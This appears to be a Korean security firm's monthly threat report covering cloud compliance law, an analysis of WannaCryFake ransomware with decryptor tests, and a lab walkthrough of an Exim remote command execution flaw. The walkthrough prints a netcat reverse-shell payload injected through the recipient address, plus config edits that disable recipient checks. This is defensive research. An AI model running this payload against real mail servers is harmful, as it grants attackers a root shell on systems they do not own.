EQST Insight_201910

Size: px
Start display at page:

Download "EQST Insight_201910"

Transcription

1 Threat Intelligence Report INSIGHT EQST(이큐스트)는 Experts, Qualified Security Team 이라는 뜻으로 사이버 위협 분석 및 연구 분야에서 검증된 최고 수준의 보안 전문가 그룹입니다.

2 Contents EQST insight Public Cloud 환경의정보보호 Compliance 이슈 Special Report WannaCryFake 랜섬웨어분석및복호화도구활용 Research & Technique Exim 원격명령실행취약점 (CVE )

3 EQST insight Public Cloud 환경의정보보호 Compliance 이슈 최근 Public Cloud 사용이증대됨에따라기존 on-premises 환경에서 Public Cloud 로데이터를이전, 운영함에있어정보보호측면에서의다양한 Compliance가이슈로대두되고있다. Public Cloud와관련된주요법률로는 클라우드컴퓨팅발전및이용자보호에관한법률 ( 이하클라우드컴퓨팅법 ), 정보통신망이용촉진및정보보호등에관한법률 ( 이하정보통신망법 ) 및 개인정보보호법 등이있다. 본보고서에서는 Compliance 측면에서이슈가되는사항들을클라우드사업자 (CSP) 와클라우드이용자 (CSU) 측면으로나누어설명하고자한다. EQST insight 1

4 Public Cloud 관련 Compliance 현황 클라우드컴퓨팅법은클라우드컴퓨팅의발전및이용을촉진하고클라우드컴퓨팅서비스를안전하게이용할수있는환경을조성하기위해제정되었다. 주로클라우드사업자가준수해야할사항을명시하고있다. 클라우드컴퓨팅사업자에게본법을적용하되관련규정이없거나충돌하지않는경우에는개별법을우선적용하는것을원칙으로한다. 클라우드컴퓨팅법제정 ( 15 년 3 월 ) 및시행 ( 15 년 9 월 ) - 정보의클라우드육성지원근거마련 - 공공 민간의클라우드이용활성화근거마련 - 안전한클라우드이용환경조성을위한이용자보호근거마련 클라우드컴퓨팅서비스정보보호에관한기준고시 ( 16 년 4 월 ) - 사업자의정보보호수준제고 클라우드보안인증제시행 ( 16 년 5 월 ~) - 클라우드컴퓨팅서비스제공자의서비스가고시기준을준수하는지확인 EQST insight 2

5 Public Cloud 보안책임의이해 클라우드사업자 (CSP) 와서비스이용고객은보안에대한책임을공유하며, on-premises, IaaS(Infra as a Service), PaaS(Platform as a Service), SaaS(Software as a Service) 별책임영역은다음과같다. Responsibility On-perm IaaS PaaS SaaS Data classification & accountability Client & end-point protection Identity & access management The Customer is responsible for security in the Cloud Application level controls Network controls Host infrastructure Physical security Platform provider is responsible for the security of the Cloud Customer Cloud provider [Public Cloud 책임공유모델 1 ] 위와같은보안책임공유모델을바탕으로 Public Cloud 의환경과특성을고려하여클라우드서비스 제공자와이용자의책임영역을세분화할필요가있다. 클라우드서비스계약및 SLA를통해세부적인보안책임을명확히하고, 안전성을보장받을수있다. 클라우드계약체결시에는과학기술정보통신부에서제정한클라우드표준계약서 ( 16년 12월 ) 를참조하여계약서를작성할수있다. 그리고전체서비스관점에서안전성을보장받을수있도록 SLA를체결할수있다. SLA에서비스수준지표에는서비스가용성, 서비스장애, 서비스성능, 데이터관리, 보안관리, 고객지원등을포함할수있다. 1 출처 : Microsoft EQST insight 3

6 Public Cloud 정보보호 Compliance 주요이슈 클라우드컴퓨팅법에는이용자권리, 이용자정보의보호, 이용자정보임치등에대한내용이명시되어있다. Public Cloud 에서발생할수있는주요이슈는클라우드사업자로이전한데이터에개인정보가포함되어있을 경우개인정보처리위탁, 국외이전, 안전성확보조치에대한사항으로상세내용은다음과같다. 1) 개인정보처리위탁 - 관련법률 : 개인정보보호법제26조 ( 업무위탁에따른개인정보의처리제한 ), 정보통신망법제25조 ( 개인정보의처리위탁 ) - 주요이슈 : 클라우드사업자가개인정보수탁자가될경우처리위탁에대한정보주체의동의가필요하며, 개인정보수탁사인클라우드사업자에대한관리 감독및교육을수행하여야한다. ( 이슈설명 ) 클라우드사업자의개인정보처리위탁에대해법원의판결, 규제기관의구체적인사례별적용이나명시적인 법해석은아직나와있지않지만, 법령해설서에서는 개인정보처리위탁 으로설명하고있음. 클라우드컴퓨팅주요법령해설서 클라우드컴퓨팅서비스는저장된개인정보의보관 / 관리등을클라우드서비스제공자가자신의책임하에수탁받아행하게되므로개인정보처리업무의위탁에해당한다는것이다수의해석이므로, 정보통신망법에따라개인정보처리업무를위탁하여야한다. 2) 개인정보국외이전 - 관련법률 : 개인정보보호법제17조 ( 개인정보의제공 ), 정보통신망법제63조 ( 국외이전개인정보의보호 ) - 주요내용 : 클라우드이용자의개인정보를국외에제공 처리 위탁 보관하기위해서는이용자의동의를받고보호조치를취하여야한다. ( 이슈설명 ) 데이터백업, 서비스연속성보장등을위해국내 Region에있는데이터를국외 Region으로이전하는경우에 개인정보국외이전 에해당하여이에따른보호조치를취해야함. 또한정보통신망법에따라개인정보국외제공의경우조회를포함하므로클라우드사업자가해외에서이용자의개인정보를조회하는것을통제하는방안을마련하여야함. EQST insight 4

7 정보통신망법 63 조 ( 개인정보의국외이전 ) 2 정보통신서비스제공자등은이용자의개인정보를국외에제공 ( 조회되는경우를포함한다 ) ㆍ처리위탁ㆍ보관 ( 이하이조에서 이전 이라한다 ) 하려면이용자의동의를받아야한다. 3) 안전성확보조치 - 관련법률 : 개인정보보호법제29조 ( 안전조치의무 ), 정보통신망법제28조 ( 개인정보의보호조치 ) - 주요이슈 : Public Cloud로이전, 운영하는데이터에개인정보가포함될경우, 개인정보보호법및정보통신망법에따른안전성확보조치를취하여야한다. ( 이슈설명 ) Public Cloud 에있는개인정보의안전성을확보하기위해서는클라우드사업자가제공하는솔루션, 3 rd Party 솔루션, 자체적으로보유하고있는솔루션중가장안전하고효과적인방법을선택하여적용해야함. 영역세부영역 CSP 솔루션 ( 예시 ) 접근권한 접근통제 접근권한관리사용자식별비밀번호관리인증정보실패횟수제한네트워크접근통제 AWS : IAM Azure : Azure AD AWS : IAM MFA Azure : Azure AD MFA AWS : NACL/Security Group Azure : Azure Firewall 시스템접속차단기능 AWS : IAM Azure : Azure AD 암호화 로그관리 외부접속시보호조치전송시암호화저장시암호화암호키관리권한관리기록보관접속기록보관및점검 AWS : VPN, Direct Connect Azure : Azure Express Route( 전용망 ) 서비스, S2S VPN, P2S VPN AWS : Certificate Manager, CloudFront, ELB Azure : Azure VPN Gateway, Azure Application Gateway AWS : S3, RDS(TDE 방식 ) 암호화등 Azure : FC(Fabric Controller), FA(Fabric Agent) 등 AWS : KSM, Cloud HSM Azure : Key Vault, HSM AWS : CloudTrail, S3 등 Azure : Azure Log Analytics AWS : CloudTrail, CloudWatch, S3 등 EQST insight 5

8 운영보안 악성프로그램방지취약점점검패치관리이중화백업및복구데이터안전파기 Azure : Azure Log Analytics AWS : 3rd party 또는자체백신 Azure : Azure Security Pack AWS : Inspector, 3rd Party 솔루션 Azure : Azure Security Center AWS : Patch Manager Azure : Azure Automation AWS : EC2, RDS 등이중화 Azure : 다중가상머신구성, Azure Site Recovery 등 AWS : Azure VM Backup 등 Azure : SQL Database Backup 등 AWS : EBS 볼륨삭제, S3 버킷비우기등 Azure : VM 연결, Azure CLI, PowerShell 등 Public Cloud 환경의정보보호 Compliance 주요이슈에대해살펴보았다. on-premises와 Public Cloud 환경에서정보보호 Compliance 기준자체는다르지않으나, 이를구현하고적용하는방법에는차이가있을수있음으로 Public Cloud에대한명확한이해와분석이필요하다. 또한 Compliance는최소한의보안기준임을명심하여단순히 Compliance 준수에만족하지않고, Public Cloud 환경에서보안수준을향상시킬수있도록클라우드사업자및클라우드이용자가공동으로노력해야할것이다. EQST insight 6

9 Special Report WannaCryFake 랜섬웨어분석및복호화도구활용 개요 공격자들이금전적이득을위한수단으로랜섬웨어 (Ransomware) 를이용한지수년이지났고그비율도점차감소하고있다. 하지만기존랜섬웨어를변형하여재사용하는변종공격이꾸준히발견되고있어주의가요구된다. 랜섬웨어는몸값을의미하는 Ransom 과 Software 의합성어로, 파일을인질로몸값을요구하며개인 PC, 기업업무 PC 등의주요파일을사용할수없도록암호화하기때문에감염시매우치명적이다. PC, 네트워크를이용하여감염및전파되기때문에동시다발적피해를유발할수있어파급력또한크다. 최근에는모바일및다수 IoT 기기까지그피해범위가확장되고있다. 일부랜섬웨어의경우국내외보안업체및연구원들에의해복호화도구가개발되어무료로공개되기도하므로감염피해발생시이를활용하여조치하는것도좋은방법이다. EQST insight 7

10 최근동향 과거랜섬웨어공격이불특정다수를노리던것과달리최근에는표적형, 즉기업을노리는랜섬웨어들이 증가하는추세이다. 랜섬웨어 정보유출 ( 기기정보 ) 13.8% 6.9% 다운로더 14.5% 가상통화채굴 4.1% DDoS 2.8% 키로깅 1.4% 런처 0.7% 정보유출 ( 금융정보 ) 0.7% 백도어 0.7% 드롭퍼 0.7% 기타 0.7% 정보유출 ( 계정정보 ) 22.1% 원격제어 31.0% [ 악성코드유형별비율 2 ] 전체악성코드비율중랜섬웨어는 13.8% 의비율을차지하고있다. 원격제어나다운로더와같은 해킹수단 을제외하면정보유출, 가상통화채굴과같은 해킹목적 관점에서는정보유출에이어두번째로큰수치이다. 쉽게말해해킹의주된목적중하나라고할수있다. 2019년 2분기평균몸값지급액은 2019년 1분기 12,762달러에서 36,295달러로 184% 증가했다. 도표의빨간선은복구비용, 파란선은가용성을지키지못하는기간 ( 중단시간 ) 에따른손실비용을나타낸다. 2 출처 : KISA EQST insight 8

11 $100, $75, $50, $25, $0.00 3/1/2019 4/1/2019 5/1/2019 6/1/2019 [2019 년 2 분기동안매일지급된랜섬웨어관련피해금액 3 ] 일반적으로랜섬웨어의몸값측정은그대상의자본수준과직접적인연관이있다. 요구하는몸값에비해적은자본을가진피해자는복구시도자체를포기하기때문이다. 따라서평균몸값지급액의증가는랜섬웨어의공격대상이기업위주로선정되고있는것으로해석된다. 그렇다면실제로는어떠한사례가존재할까? 다음은 KISA에서 2019년에공개한랜섬웨어사례들이다. - WebLogic Server 취약점 (CVE ) 을악용하여원격랜섬웨어 (sodinokibi) 실행 - 중앙관리서버 (AD 서버 ) 에침투하여관리서버에연결된시스템에랜섬웨어 (Clop) 를삽입 [ 랜섬웨어피해사례 ] WebLogic 취약점공격의경우 WebLogic Port들에대한스캐닝을통해취약점이존재하는서버를찾는다. 이는불특정다수에대한공격으로도보일수있으나 WebLogic 은기업이주로이용하는미들웨어이다. 두번째사례는진정한표적형랜섬웨어라고볼수있다. 개인보다상대적으로가치가큰데이터들을가지고있는기업에서큰몸값을얻어내기위하여공격자는스피어피싱을통한내부망접근및주요관리서버탈취후랜섬웨어를삽입했다. 기업에대한랜섬웨어공격은기업이백업을잘수행하여복구가가능하다고하더라도복구기간동안서비스제공에차질을줄수있다. 때문에서비스가용성이중요한기업에서는돈을주고서라도빠르게복구하려는경향이있다. 따라서해커들은이런점을약점으로여겨향후에도기업을표적으로하는랜섬웨어공격을더욱빈번히시도할것으로보인다. 3 출처 : EQST insight 9

12 Paradise CryptoMix 1.1% 1.1% Sodinokibi Dharma 12.5% 13.6% Mr.Dec 2.3% GandCrab 10.2% Phobos 17.0% IEncrypt 3.4% Globelmposter % Rapid 3.4% Matrix 1.1% Ryuk 23.9% [2019 년 2 분기랜섬웨어유형 ] 위통계처럼랜섬웨어는매우다양하게분류된다. 이번보고서에서다루는 WannaCryFake 랜섬웨어는 Phobos 랜섬웨어의변종으로마치 WannaCry 랜섬웨어인것처럼위장하는특징을가지고있다. Phobos 랜섬웨어는위와같이가장널리퍼진랜섬웨어유형중하나다. EQST insight 10

13 감염시나리오 Victim s PC Hacker HTML Malicious webpage 4 5 Browser 취약점 유발 악성파일 Internet! Browser 다운로드 요청 C&C Server 1 Exploit Kit으로악성 Script 삽입 EXE 6 Malware 악성파일 WWW. 3 다운로드 Ad 7 백신 강제 종료악성페이지로 Advertise Banner Redirect Victim 2 8 $ 광고페이지 접근 Vaccine 설치 Ransomware [ 피해시나리오 ( 불특정다수 )] 1 Exploit Kit 을통해정상웹페이지에있는광고배너에악성 Script를삽입한다. - Exploit Kit : 특정취약점에대한공격을자동화한도구 2 피해자는악성광고배너가존재하는페이지에접근한다. 3 피해자는광고배너에존재하는악성 Script에의해악성웹페이지로 Redirect 된다. - Redirect : URL 요청을다른 URL로넘겨주는행위 4 악성페이지에존재하는 피해자 Browser 의취약점을유발하는코드 를실행한다. 5 취약점에의해 C2 서버로부터의악성파일다운로드를요청하게된다. 6 C2 서버로부터악성파일다운로드후실행한다. 7 랜섬웨어설치를막는백신들을종료시킨다. 8 랜섬웨어를설치후동작시킨다. EQST insight 11

14 VDI Network Hacker 1 피싱메일 송신 VDI PC 실행 EXE SMB VDI PC Pool 생성스캐닝 $ 악성 Ammyy 8 랜섬웨어 배포매크로문서 RAT 5 침투 7 Cobalt Strike AD Server 실행 C&C Remote 6 Reverse Connection [ 피해시나리오 ( 표적형 )] 1 표적을속일만한피싱메일을송신한다. 2 피해자는 VDI PC에서피싱메일에포함된 악성매크로가포함된문서 를실행한다. 3 악성매크로에의해 Ammyy RAT 가생성되고, 해커는해당시스템의제어권을가지게된다. - Ammyy RAT : 원격에서해당시스템을관리자처럼이용하게해주는악성도구중하나 4 SMB 스캐닝을통해네트워크망을파악한다. - SMB : 윈도 OS에서파일이나디렉터리및주변장치들을공유하는데사용되는프로토콜 ( 메시지규약 ) 5 AD 서버를발견한뒤취약점또는무차별대입공격을통해서버를장악한다. - AD 서버 : 도메인 ( 관리자가설정한그룹 ) 에연결된시스템들의인증과디렉터리서비스등을관리하는서버 6 AD 서버에서해커와 Reverse Connection 을맺는다. 7 Cobalt Strike 를이용하여도메인계정탈취등의랜섬웨어배포를위한준비를한다. - Cobalt Strike : 시스템침투테스터를위한다양한기능을가진도구 8 AD서버를이용하여랜섬웨어를네트워크망에배포한다. EQST insight 12

15 복호화도구소개 랜섬웨어의종류가증가함에따라복호화도구도다양하게공개되어있다. 우선복호화도구를사용하기위해서는감염된랜섬웨어의종류와버전확인이필수적이다. Malwarehunterteam 페이지를이용하면감염랜섬웨어의종류및정보의확인이가능하다. (URL : [ 감염랜섬웨어확인 ] EQST insight 13

16 한국랜섬웨어침해대응센터 에는국내외보안업체에서공개한복호화도구가소개되어있다.) (URL : ) 등록일 제목 Gandcrab v1, v4, v5.2 Decryptor Gandcrab v1, v4, v5.0.3 Decryptor Avast_Decryptor_CrySiS Decryptor TeslaCrypt Decryptor Xorist Decryptor Shade Decryptor Scatter Decryptor WildFire Decryptor Rannoh Decryptor Rakhni Decryptor crypto Decryptor CryptXXX3.0 Decryptor TeslaCrypt Decryptor CryptXXX2.0(.crypt) Decryptor CryptXXX(.crypt) Decryptor Crypted Decryptor TeslaCrypt2.2(.ccc,.vvv) Decryptor(Bitcoin) TeslaCrypt2.2(.ccc,.vvv) Decryptor(AES key) EQST insight 14

17 그외국내기관중에는한국인터넷진흥원 (KISA) krcert 사이트에랜섬웨어복호화도구가소개되어있으며, 해외사이트로는노모어랜섬 (no more ransom) 에복호화도구가한국어로정리되어있다. - krcert : - 노모어랜섬 : 최근에는 WannaCryFake 랜섬웨어의복호화도구가공개되었다. 하지만개발회사에서는공개된복호화도구가해당랜섬웨어에대응하여모든파일을복구할수있다는보증을하진않는다. 그리고복호화과정에서오류가발생할시해당파일에대해선영원히복구가불가능하다. 이에본리포트에서는복호화도구의검증을위해복원성공률등을테스트하였다. 감염증상 보통의랜섬웨어와같이 WannaCryFake 랜섬웨어도랜섬노트, 확장자를통해쉽게감염여부를확인할수 있다. 실행시암호화를진행하며암호화여부와관계없이대부분의파일확장자를 WannaCry 로변경한다. [ 확장자변경 ] EQST insight 15

18 암호화동작및파일확장자변경작업을완료하면, Info.hta 라는이름의랜섬노트파일을생성한다. 생성된 파일은사용자가감염사실을인지할수있도록윈도우창형태로출력된다. [ 랜섬노트 ] 소스코드분석 WannaCryFake 랜섬웨어는.Net FrameWork 4 버전이상의실행환경을요구하는 C# 프로그래밍언어로 작성된악성코드이다. 악성코드파일속성은 Windows Defender 처럼보이도록설정되어있는것으로 확인된다. [ 파일정보 ] 실행시드라이브, 공유폴더등시스템정보를확인하여암호화할대상을특정한다. 이때암호화에필요한 확장자및암호화에필요한키를설정한다. 암호화키는내부의고정된특정데이터를이용해 SHA-256 해시 EQST insight 16

19 알고리즘을사용하여생성한다. 설정이완료되면사용자의파일에대하여암호화진행및파일의확장자를 변경한다. [ 키생성 ] 생성한키를이용하여암호화및파일의확장자를변경한다. [ 암호화및확장자변경 ] [ 파일암호화코드 ] EQST insight 17

20 암호화대상파일확장자는총 650 개로다음과같다. 해당확장자를제외한파일의경우파일명만변경되고 암호화는진행되지않는다. 실행파일역시암호화대상에서제외된다. 그러나확장자변경으로인해 정상적으로실행되지않아시스템구동에문제가발생할가능성도있다..csv.efx.sdf.vcf.xml.ses.rar.zip.7zip.jpg.jpeg.raw.tif.gif.png.bmp.3dm.max.accdb.db.dbf.mdb.pdb.s ql.dwg.dxf.c.cpp.cs.h.php.asp.rb.java.jar.class.py.js.aaf.aep.aepx. plb.prel.prproj.aet.ppj.psd.indd.indl.indt.indb.inx.idml.pmd.xqx.xqx.ai.eps.ps.svg.swf.fla.as3.as.txt. doc.dot.docx.docm.dotx.dotm.docb.rtf.wpd.wps.msg.pdf.xls.xlt.xlm.xlsx.xlsm.xltx.xltm.xlsb.xla.xla m.xll.xlw.ppt.pot.pps.pptx.pptm.potx.potm.ppam.ppsx.ppsm.sldx.sldm.wav.mp3.aif.iff.m3u.m4u. mid.mpa.wma.ra.avi.mov.mp4.3gp.mpeg.3g2.asf.asx.flv.mpg.wmv.vob.m3u8.mkv.1cd.3dm.3ds.3 fr.3g2.3gp.3pr.7z.7zip.aac.aaf.ab4.accdb.accde.accdr.accdt.ach.acr.act.adb.adp.ads.aep.aepx.aes. aet.agdl.ai.aif.aiff.ait.al.amr.aoi.apj.apk.arch00.arw.as.as3.asf.asm.asp.aspx.asset.asx.atr.avi.awg.b ack.backup.backupdb.bak.bar.bay.bc6.bc7.bdb.bgt.big.bik.bin.bkf.bkp.blend.blob.bmd.bmp.bpw.b sa.c.cas.cdc.cdf.cdr.cdr3.cdr4.cdr5.cdr6.cdrw.cdx.ce1.ce2.cer.cfg.cfr.cgm.cib.class.cls.cmt.config.c ontact.cpi.cpp.cr2.craw.crt.crw.cs.csh.csl.css.csv.d3dbsp.dac.dar.das.dat.dazip.db.db0.db3.dba.dbf.dbx.db_journal.dc2.dcr.dcs.ddd.ddoc.ddrw.dds.der.des.desc.design.dgc.dir.dit.djvu.dmp.dng.doc.d ocb.docm.docx.dot.dotm.dotx.drf.drw.dtd.dwg.dxb.dxf.dxg.easm.edb.efx.eml.epk.eps.erbsql.erf.e sm.exf.fdb.ff.ffd.fff.fh.fhd.fla.flac.flf.flv.flvv.forge.fos.fpk.fpx.fsh.fxg.gdb.gdoc.gho.gif.gmap.gray. grey.groups.gry.gsheet.h.hbk.hdd.hkdb.hkx.hplg.hpp.htm.html.hvpl.ibank.ibd.ibz.icxs.idml.idx.iff.iif.iiq.incpas.indb.indd.indl.indt.inx.itdb.itl.itm.iwd.iwi.jar.java.jnt.jpe.jpeg.jpg.js.kc2.kdb.kdbx.kdc.key.kf.kpdx.kwm.laccdb.layout.lbf.lck.ldf.lit.litemod.log.lrf.ltx.lua.lvl.m.m2.m2ts.m3u.m3u8.m4a.m4p. m4u.m4v.map.max.mbx.mcmeta.md.mdb.mdbackup.mdc.mddata.mdf.mdi.mef.menu.mfw.mid.m kv.mlb.mlx.mmw.mny.mos.mov.mp3.mp4.mpa.mpeg.mpg.mpp.mpqge.mrw.mrwref.msg.myd.nc. ncf.nd.ndd.ndf.nef.nk2.nop.nrw.ns2.ns3.ns4.nsd.nsf.nsg.nsh.ntl.nvram.nwb.nx2.nxl.nyf.oab.obj.o db.odc.odf.odg.odm.odp.ods.odt.ogg.oil.orf.ost.otg.oth.otp.ots.ott.p12.p7b.p7c.pab.pages.pak.p as.pat.pcd.pct.pdb.pdd.pdf.pef.pem.pfx.php.pif.pkpass.pl.plb.plc.plt.plus_muhd.pmd.png.po.pot.p otm.potx.ppam.ppj.ppk.pps.ppsm.ppsx.ppt.pptm.pptx.prel.prf.prproj.ps.psafe3.psd.psk.pst.ptx.pw m.py.qba.qbb.qbm.qbr.qbw.qbx.qby.qcow.qcow2.qdf.qed.qic.r3d.ra.raf.rar.rat.raw.rb.rdb.re4.rgs s3a.rim.rm.rofl.rtf.rvt.rw2.rwl.rwz.s3db.safe.sas7bdat.sav.save.say.sb.sd0.sda.sdf.ses.shx.sid.sidd.si dn.sie.sis.sldasm.sldblk.sldm.sldprt.sldx.slm.snx.sql.sqlite.sqlite3.sqlitedb.sr2.srf.srt.srw.st4.st5.st6.st7.st8.stc.std.sti.stl.stm.stw.stx.sum.svg.swf.sxc.sxd.sxg.sxi.sxm.sxw.syncdb.t12.t13.tap.tax.tex.tga.th m.tif.tlg.tor.txt.upk.v3d.vbox.vcf.vdf.vdi.vfs0.vhd.vhdx.vmdk.vmsd.vmx.vmxf.vob.vpk.vpp_pc.vtf.w 3x.wab.wad.wallet.wav.wb2.wma.wmo.wmv.wotreplay.wpd.wps.x11.x3f.xf.xis.xla.xlam.xlk.xll.xlm.xlr.xls.xlsb.xlsb3dm.xlsm.xlsx.xlt.xltm.xltx.xlw.xml.xqx.xxx.ycbcra.yuv.zip.ztmp [ 대상확장자 ] EQST insight 18

21 악성코드내부자원에는랜섬노트를작성하기위한코드가삽입되어있으며 HTML Applications(HTA) 형식으로제작되어사용자에게노출되도록한다. 랜섬노트내에는파일의암호화와비트코인의지급에대한내용이있으며특정이메일로연락하라는설명이있다. 직접이메일을보내고공격자와 XMPP을이용해대화하는방법을안내한다. - XMPP : XML 기반인터넷통신을위한오픈프로토콜 [ 랜섬노트생성 ] EQST insight 19

22 복호화도구검증 랜섬노트와확장자로보아 WannaCryFake 랜섬웨어로확인되면복호화도구를이용하여복구를진행할수있다. 해당도구는 NoMoreRansom 프로젝트를지원하는 Emsisoft에서제공하며아래의링크를통해다운로드할수있다. 도구의사용법도간단하게 PDF 형식으로제공하고있다. (URL : [ 복호화도구사용방법 ] 해당도구를사용하면아래와같이암호화된파일에대하여복호화를진행할수있다. 도구를테스트하기 위해일반적으로사용되는문서, 인증서, 압축파일등 28 개확장자에대하여복호화를진행하였으며암호화된 모든파일이복호화가되는것이확인되었다. EQST insight 20

23 - 테스트확장자 txt xml java jar der cer dat png bmp jpg gif pdf pptx docx xlsx zip tar 7z iso html htm key py pyc wmv avi mp4 sql [ 복호화성공파일 ] 그리고복호화진행중일부파일에서 패딩오류, 데이터오류 2 가지형태로 Error 메시지가출력되는경우 가발생한다. [Error 메시지 ] EQST insight 21

24 실제해당파일을확인해보면복호화를진행하지못한것이아니라, 암호화가진행되지않고파일명및 확장자만변경된정상파일이기때문에오류가발생한것으로확인된다. [ 정상파일확인 - MZ] 실제암호화가되지않더라도확장자변경으로인해시스템에문제가발생할수있으므로주의가요구된다. [ 이름만변경된파일 ] EQST insight 22

25 감염조치 랜섬웨어이름, 버전, 파일확장자확인후, 감염된랜섬웨어에대한복호화도구를이용하여복호화시도. 도구이용시원본파일백업후사용권고. 복호화도구가없더라도추후배포될수있으므로감염파일별도보관권고 해커에게복구비용을지급해도해독키를수신하지못할수있음 시스템복원기능활용또는초기화 예방수칙 Windows 업데이트최신버전유지 백신프로그램설치후업데이트최신버전유지 백신프로그램실시간감시기능활성화 중요도가높은파일은별도외부저장장치에따로저장하고주기적으로백업 필요한프로그램은관련공식사이트에서만다운로드 안전하지않은사이트접속및파일다운로드이용지양 검증되지않은파일에대한다운로드및실행시, 백신점검후사용 검증되지않은이메일에포함된하이퍼링크및첨부된실행파일, 스크립트파일, 문서파일등의의심 파일실행금지 문서편집기 (Word, Excel, HWP 등 ) 의매크로기능미사용으로설정 Flash player, Adobe Reader 최신버전유지 탐색기옵션보안설정강화폴더옵션 > 보기 > 고급설정 > 알려진파일형식의파일확장자숨기기비활성화 ( 이중확장자악성코드식별 ) EQST insight 23

26 Research & Technique Exim 원격명령실행취약점 (CVE ) 취약점개요 Exim은인터넷에연결된 Unix 시스템을위해개발된메시지전송에이전트 (MTA : Message Transfer Agent) 이다. 메시지전송에이전트는메일서버로메시지를보내거나, 메일서버간에메일을송수신하는역할을한다. 이와같은 Exim 메일서비스에서명령어를실행할수있는원격명령실행취약점이발견됐다. 수신자주소에대한검증이미흡하여삽입된명령어가 Exim 서버에서실행된것이다. 해당취약점은로컬공격자가즉시악용가능하며, root 권한으로명령을실행할수있다. 특정구성이적용된 Exim 서버의경우원격공격또한가능하다. 해당취약점발견자는 Exim 의최신변경사항을코드검토중발견했으며, 당시신규버전 (4.92) 은조치되어배포된상태임을확인했다. 영향받는소프트웨어버전과대응방안은다음과같으며, 본보고서를통해 Exim 원격명령실행 취약점 (CVE ) 을상세분석하고공격시나리오에대해살펴보고자한다. EQST insight 24

27 영향받는소프트웨어버전 S/W 구분 Exim 취약버전 4.87 ~ 4.91 버전 대응방안 Exim 원격명령실행취약점 (CVE ) 해결을위한패치버전은 4.92 이나, Linux OS 별제조사에서 제공하는패치버전은상이할수있다. 단, CVE 취약점이후 Exim 취약점이추가로보고되어 관련사항을참고할것을권고한다. 19 년도발견된 Exim 취약점취약버전패치버전 CVE ~ (Linux OS 별제조사제공패치버전은 상이할수있음 ) CVE ~ CVE ~ CVE ~ Exim 공식홈페이지를참고하여최신버전정보와다운로드정보를확인할수있다. [Exim 공식홈페이지공지확인 ] EQST insight 25

28 [Exim 공식홈페이지다운로드링크 ] 공격시나리오 공격자가 CVE 취약점을이용하여취약한대상의 PC 제어권을탈취하고중요정보를획득하는 시나리오는다음과같다. Exim(MTA) Mail Server 1 대상탐색 CVE 관리자 쉘 (PC 제어권 탈취 ) 3 데이터베이스 공격자 [ 공격시나리오 ] 1 공격자는메일서버가취약한버전의 Exim 을사용하는것을확인함 2 공격자는메일전송시악의적인명령을전달하여 RCE 을시도함 3 공격을통해피해자 PC 의제어권을탈취하고, 중요정보를획득함 EQST insight 26

29 테스트환경구성정보 역할구분 공격자 피해자 정보 Kali Linux 64bit Ubuntu 64bit / Exim(4.89) 취약점테스트 Step 1. 취약점테스트환경구축 Exim 설치후초기설정값을유지할경우, 원격공격이가능하나시나리오상공격자가취약한서버에 7일이상접속을유지 ( 해당조건은무시되도록설정 ) 해야한다. 또한원격으로악용하기쉬운구성설정이일부필요하며아래와같다. - 관리자가 verify =recipient ACL( 접근제어리스트 ) 을제거한경우 - 수신자주소의로컬부분에서태그를인식하도록구성된경우예 ) 'local_part_suffix = + * : - *' 주석을제거 - Exim이보조 MX (Mail exchange) 로원격도메인주소에메일을전달하게설정된경우 위내용을참고하여원격으로공격을원활히진행하기위해 Exim 설치후기본구성을아래와같은방식으로 7 일이상접속없이공격가능하도록릴레이허용 ( 테스트목적 ) sed -iz 's/domainlist relay_to_domains =/domainlist relay_to_domains = */' /usr/exim/configure sed -i '/hostlist relay_from_hosts = localhost/c\hostlist relay_from_hosts = ' 관리자가 "verify = recipient" ACL( 접근제어리스트 ) 을수동으로제거 sed -i '/require verify = recipient/c\#require verify = recipient' /usr/exim/configure [Python 스크립트 (poc.py)] EQST insight 27

30 Step 2. PoC 테스트 공개된 PoC를이용해공격을수행했다. 스크립트는피해자 PC에 TCP 연결을수행한뒤, 지정된방식에따라메일을전송한다. 이때수신자정보데이터를명령어구문으로설정한다. PoC 테스트를위해쉘스크립트파일 (exploit.sh) 중피해자 PC에서실행시킬명령어 (PAYLOAD) 와공격대상 (HOST) 값을테스트조건과환경에맞게수정해서사용하였다. [ 쉘스크립트 (exploit.sh) 4 ] PoC 테스트에서사용할명령어 (PAYLOAD) 는리버스쉘을수행하며, 다음과같다. ( 공격자 IP : , netcat OPEN 포트번호 : 10149) mkfifo /tmp/test; nc </tmp/test /bin/sh >/tmp/test 2>&1; rm /tmp/test 4 PoC 출처 : EQST insight 28

31 1) 원격 (Remote) 에서 PoC 테스트수행 공격자 PC 에서 netcat 으로특정포트 (10149) 를 OPEN 하여 LISTEN 상태로대기한다. [netcat 포트 (10149) OPEN] 공격자 PC 에서 exploit.sh 파일을실행한다. 피해자 PC 와연결되어처리되는송 / 수신데이터를확인가능하며, 수신자정보 (RCPT TO) 값으로명령어구문이설정된것을알수있다. [exploit.sh 실행 ] EQST insight 29

32 공격자 PC 에서 netcat 으로대기중인포트 (15107) 에피해자 PC 의쉘이출력된다. [ 원격 PoC 테스트성공 ] 취약점상세분석 Step 1. Exim 기능 1) Exim 의문자열확장 (String expansions) 사용자입력값이확장을통해처리되고, 처리된결과값으로명령어를수행한다. Exim 또한런타임구성의 많은문자열이사용되기전에처리된다. 문자열확장에서 $ 는확장문자열로, \ 은이스케이프문자로 처리되고그외에는그대로복사되어사용된다. 2) Exim 확장항목 ${run} ${run<command> <args>} {<string1>}{<string2>}} 명령 (command) 과인수 (args) 는먼저하나의문자열로확장된다. 문자열은공백으로개별인수로분리된다음 명령은별도의프로세스로실행되지만동일한 uid 및 gid 에서실행된다. Exim 에서다른명령을실행할때와 마찬가지로쉘은기본적으로사용되지않는다. 명령에쉘이필요한경우명시적으로작성해야한다. EQST insight 30

